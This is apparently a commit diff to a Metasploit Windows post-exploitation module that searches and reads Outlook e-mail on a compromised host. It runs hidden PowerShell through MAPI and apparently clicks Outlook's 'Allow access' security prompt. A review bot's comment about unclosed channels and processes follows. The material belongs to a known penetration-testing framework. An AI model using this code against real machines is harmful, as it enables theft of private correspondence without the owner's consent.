Add Windows post module for reading/searching Outlook e-mail #7
parent
611e8c72eb
commit
3cadcb942a
|
@ -4,14 +4,13 @@
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'iconv'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
include Msf::Post::Windows::Registry
|
include Msf::Post::Windows::Registry
|
||||||
|
include Msf::Post::Windows::Powershell
|
||||||
|
|
||||||
A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
|
A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
|
||||||
ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gewähren für", "de_AT" => "Zugriff gewähren für" }
|
ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -68,13 +67,11 @@ class Metasploit3 < Msf::Post
|
||||||
}
|
}
|
||||||
List-Folder
|
List-Folder
|
||||||
|
|
|
|
||||||
utf16conv = Iconv.conv('UTF16LE', 'ASCII', psh_script)
|
compressed_script = compress_script(psh_script)
|
||||||
encoded_psh = Rex::Text.encode_base64(utf16conv)
|
cmd_out, runnings_pids, open_channels = execute_script(compressed_script)
|
||||||
listBoxes_res = session.sys.process.execute("powershell.exe -enc #{encoded_psh}", nil, {'Hidden' => true, 'Channelized' => true})
|
while(d = cmd_out.channel.read)
|
||||||
sleep 3
|
print ("#{d}")
|
||||||
print listBoxes_res.channel.read
|
end
|
||||||
listBoxes_res.channel.close
|
|
||||||
listBoxes_res.close
|
|
||||||
currentidle = session.ui.idle_time
|
currentidle = session.ui.idle_time
|
||||||
print("\n")
|
print("\n")
|
||||||
print_status("System has currently been idle for #{currentidle} seconds")
|
print_status("System has currently been idle for #{currentidle} seconds")
|
||||||
|
@ -93,26 +90,23 @@ class Metasploit3 < Msf::Post
|
||||||
$Namespace = $Outlook.GetNameSpace("MAPI")
|
$Namespace = $Outlook.GetNameSpace("MAPI")
|
||||||
$account = $NameSpace.Folders
|
$account = $NameSpace.Folders
|
||||||
$count = 0
|
$count = 0
|
||||||
try {
|
|
||||||
foreach ($acc in $account) {
|
foreach ($acc in $account) {
|
||||||
$count = $count+1
|
$count = $count+1
|
||||||
|
try {
|
||||||
$Email = $NameSpace.Folders.Item($count).Folders.Item($Folder).Items
|
$Email = $NameSpace.Folders.Item($count).Folders.Item($Folder).Items
|
||||||
$Email \| Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'} \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
|
$Email \| Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'} \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
|
||||||
|
} catch {
|
||||||
|
Write-Host "Folder not found in mailbox $count"
|
||||||
}
|
}
|
||||||
} catch {
|
}
|
||||||
Write-Host "The folder does not exist in the Outlook installation. Please fill in a correct foldername."
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
Get-Emails "#{keyword}" "#{folder}" "#{searchobject}"
|
Get-Emails "#{keyword}" "#{folder}" "#{searchobject}"
|
||||||
|
|
|
|
||||||
utf16conv = Iconv.conv('UTF16LE', 'ASCII', psh_script)
|
compressed_script = compress_script(psh_script)
|
||||||
encoded_psh = Rex::Text.encode_base64(utf16conv)
|
cmd_out, runnings_pids, open_channels = execute_script(compressed_script, 120)
|
||||||
readEmails_res = session.sys.process.execute("powershell.exe -enc #{encoded_psh}", nil, {'Hidden' => true, 'Channelized' => true})
|
while(d = cmd_out.channel.read)
|
||||||
while(d = readEmails_res.channel.read)
|
|
||||||
print ("#{d}")
|
print ("#{d}")
|
||||||
end
|
end
|
||||||
readEmails_res.channel.close
|
|
||||||
readEmails_res.close
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def clickButton(atrans,acftrans)
|
def clickButton(atrans,acftrans)
|
||||||
|
|
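Review bot: Both new read loops (the one after `List-Folder` and the one after `Get-Emails`) drain `cmd_out.channel` but never close it, and the `runnings_pids` and `open_channels` values returned by `execute_script` are assigned and then ignored. The code being replaced ended each call with `channel.close` and a `close` on the process handle, so unless the Powershell mixin releases these itself, every run leaves a channel and a powershell.exe process open on the session. I would keep the cleanup after each loop, for example `cmd_out.channel.close` followed by `cmd_out.close`, preferably inside an `ensure` so it also runs when the read raises. The first call also omits the timeout that the second one passes (`execute_script(compressed_script, 120)`), which is worth making consistent. Both enclosing methods start outside the hunks shown, so any existing cleanup further up or down is not visible here.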